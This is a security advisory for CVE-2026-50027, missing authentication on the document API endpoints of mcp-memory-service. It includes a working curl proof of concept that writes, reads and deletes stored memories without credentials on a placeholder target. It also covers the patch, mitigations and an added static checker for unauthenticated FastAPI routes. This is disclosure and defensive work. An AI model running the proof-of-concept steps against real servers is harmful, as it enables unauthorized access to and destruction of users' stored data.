critical · 9.8 · CVE-2026-50027 · Jul 2, 2026

CVE-2026-50027: mcp-memory-service Missing Authentication on Document API Endpoints

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

All seven file/document endpoints in mcp-memory-service accepted requests without any credentials, letting anyone on the network read, write, or delete stored AI memories even when API-key or OAuth au

Package: mcp-memory-service
Ecosystem: pip
Affected: < 10.67.1
Fixed in: 10.67.1

The problem

The FastAPI router in `documents.py` was instantiated as `router = APIRouter()` with no `dependencies=` argument, and the file never imported `Depends`. This meant every route under `/api/documents/*` (upload, batch-upload, status, history, remove, remove-by-tags, search-content) ran with no authentication check at all.

The sibling `memories.py` router correctly used `Depends(require_write_access)` on equivalent routes, so the authentication infrastructure existed and worked. The omission in `documents.py` created an inconsistent boundary that bypassed the entire auth layer. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Proof of concept

A working proof-of-concept for CVE-2026-50027 in mcp-memory-service, with the exact payload below.

```bash
# Step 1: confirm auth IS enforced on /api/memories (expect 401)
curl -i http://TARGET:8000/api/memories
# HTTP/1.1 401 Unauthorized

# Step 2: write arbitrary content into the memory store -- no credentials
printf 'attacker-controlled content' > /tmp/poc.txt
UPLOAD_ID=$(
  curl -s -X POST http://TARGET:8000/api/documents/upload \
    -F "file=@/tmp/poc.txt" -F "tags=poc-tag" |
  python3 -c 'import sys,json; print(json.load(sys.stdin)["upload_id"])'
)
# HTTP/1.1 200 OK  {"upload_id": "<uuid>"}

# Step 3: read stored document content -- no credentials
curl -s "http://TARGET:8000/api/documents/search-content/$UPLOAD_ID"
# HTTP/1.1 200 OK  (returns full document content)

# Step 4: delete all memories matching a tag -- no credentials
curl -i -X DELETE "http://TARGET:8000/api/documents/remove-by-tags" \
  -H "Content-Type: application/json" \
  -d '["poc-tag"]'
# HTTP/1.1 200 OK  {"memories_deleted": 1}
```

The root cause is CWE-306 (Missing Authentication for Critical Function). `documents.py` never imported `Depends` from FastAPI and instantiated its router without a `dependencies=` parameter, so FastAPI had no hook to invoke any auth middleware on any of the seven routes.

Patch commit 907bac72 (shipped in 10.67.1) added `Depends(require_write_access)` as a parameter to write routes (upload, batch-upload, remove, remove-by-tags) and `Depends(require_read_access)` to read routes (status, history, search-content). Because FastAPI reads each route's dependencies from the handler's signature when the route is registered and runs them before the handler on every request, adding the `Depends(...)` argument to each function signature is sufficient to enforce the existing auth logic that was already protecting `memories.py`.
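A static check for this class of omission, as an added example that is not part of the advisory or the project's code: it parses a router module with Python's `ast` and lists route handlers that neither a router-level, decorator-level nor signature-level `Depends(require_read_access)` / `Depends(require_write_access)` covers. The sample sources and handler names are constructed, and the check assumes the two dependency functions are referenced by bare name.

```python
import ast

HTTP_METHODS = {"get", "post", "put", "patch", "delete"}
AUTH_DEPS = {"require_read_access", "require_write_access"}  # names from the advisory

def _is_auth_dep(node):
    """True for Depends(require_read_access) / Depends(require_write_access)."""
    return (isinstance(node, ast.Call)
            and getattr(node.func, "id", getattr(node.func, "attr", "")) == "Depends"
            and bool(node.args)
            and getattr(node.args[0], "id", None) in AUTH_DEPS)

def _has_auth(node):
    return any(_is_auth_dep(n) for n in ast.walk(node))

def unauthenticated_routes(source):
    """Return [(METHOD, path, handler)] for routes that no auth dependency covers."""
    tree = ast.parse(source)
    # Routers built as APIRouter(dependencies=[Depends(require_...)]) cover all their routes.
    guarded = {t.id for n in ast.walk(tree) if isinstance(n, ast.Assign)
               and isinstance(n.value, ast.Call) and _has_auth(n.value)
               for t in n.targets if isinstance(t, ast.Name)}
    findings = []
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for dec in fn.decorator_list:
            f = getattr(dec, "func", None)
            if not (isinstance(f, ast.Attribute) and f.attr in HTTP_METHODS
                    and isinstance(f.value, ast.Name)):
                continue
            # Auth may come from the router, the decorator, or the handler signature.
            if f.value.id in guarded or _has_auth(dec) or _has_auth(fn.args):
                continue
            path = dec.args[0].value if dec.args and isinstance(dec.args[0], ast.Constant) else "?"
            findings.append((f.attr.upper(), path, fn.name))
    return findings

# Constructed samples modelled on the advisory's description; handler names are hypothetical.
VULNERABLE = '''
from fastapi import APIRouter
router = APIRouter()
@router.post("/upload")
async def upload(file): ...
@router.delete("/remove-by-tags")
async def remove_by_tags(tags): ...
'''
PATCHED = (VULNERABLE.replace("(file)", "(file, _=Depends(require_write_access))")
           .replace("(tags)", "(tags, _=Depends(require_write_access))"))
```

Run over every router module in CI, a non-empty result from `unauthenticated_routes()` fails the build; a `Depends()` on anything other than the two auth functions does not count as coverage.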

The fix

Upgrade to mcp-memory-service 10.67.1 or later. The patch (commit 907bac72) adds `Depends(require_write_access)` or `Depends(require_read_access)` to every function signature in `documents.py`, bringing all seven `/api/documents/*` endpoints under the same authentication enforcement already present on `/api/memories/*`.

If you cannot upgrade immediately, remove network exposure of the HTTP server (bind to 127.0.0.1 only, or place behind an authenticating reverse proxy) until you can apply the patch.

Reporter not attributed.
